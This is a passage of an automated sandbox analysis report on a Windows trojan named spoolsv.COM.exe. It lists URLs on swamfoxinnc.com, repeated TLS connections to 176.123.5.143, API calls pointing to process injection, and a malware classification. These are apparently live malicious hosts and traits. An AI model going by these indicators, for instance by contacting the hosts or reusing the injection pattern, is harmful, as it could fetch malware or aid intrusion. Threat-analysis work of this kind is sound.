          Source: spoolsv.COM.exe, 00000005.00000003.2396794289.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2503409286.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2430700731.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2362712355.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com:443/233_Svcrhpjadgy7
          Source: spoolsv.COM.exe, 00000005.00000003.2396794289.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2503409286.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2291813654.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2430700731.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2362712355.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com:443/233_Svcrhpjadgyj
          Source: spoolsv.COM.exe, 00000005.00000003.2081446105.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1424107287.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1908555054.00000000216B6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2015374252.0000000021692000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1839665207.00000000216B2000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1735009336.000000002166F000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2323851649.00000000216F3000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1424434949.00000000216AB000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2289596193.000000002169F000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1666608167.0000000021670000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1354494044.000000002167C000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1805561761.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1424226209.0000000021673000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1464632700.000000002166E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1632731035.00000000216C7000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1496784556.0000000021675000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1426618232.0000000021661000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2184812774.00000000216B6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1354494044.00000000216B5000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2291723825.000000002169A000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1320809972.00000000005D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
          Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
          Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
          Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
          Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
          Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
          Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49701 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49763 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49775 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49786 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49794 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49805 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49813 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49825 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49833 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49844 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49855 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49864 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49875 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49883 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49894 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49904 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49913 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49924 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49932 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49944 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49951 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49963 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49973 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49982 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:49994 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:50001 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:50012 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:50023 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:50031 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 176.123.5.143:443 -> 192.168.2.10:50042 version: TLS 1.2
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B3DBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,5_2_02B3DBB0
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B37D00 NtWriteVirtualMemory,5_2_02B37D00
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B3DACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,5_2_02B3DACC
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B3DA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,5_2_02B3DA44
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B38BB0 GetThreadContext,SetThreadContext,NtResumeThread,5_2_02B38BB0
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B38BAE GetThreadContext,SetThreadContext,NtResumeThread,5_2_02B38BAE
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B3D9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,5_2_02B3D9F0
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B3EC74 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,5_2_02B3EC74
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B220C45_2_02B220C4
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B4D5965_2_02B4D596
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: String function: 02B244D0 appears 32 times
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: String function: 02B387A0 appears 54 times
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: String function: 02B246A4 appears 244 times
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: String function: 02B38824 appears 45 times
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: String function: 02B2480C appears 931 times
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: String function: 02B244AC appears 73 times
          Source: spoolsv.COM.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: classification engineClassification label: mal88.troj.evad.winEXE@1/0@1/1
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B27F5A GetDiskFreeSpaceA,5_2_02B27F5A
          Source: C:\Users\user\Desktop\spoolsv.COM.exeCode function: 5_2_02B36D50 CoCreateInstance,5_2_02B36D50
          Source: C:\Users\user\Desktop\spoolsv.COM.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: spoolsv.COM.exeVirustotal: Detection: 74%
          Source: spoolsv.COM.exeReversingLabs: Detection: 63%
          Source: C:\Users\user\Desktop\spoolsv.COM.exeFile read: C:\Users\user\Desktop\spoolsv.COM.exeJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: url.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
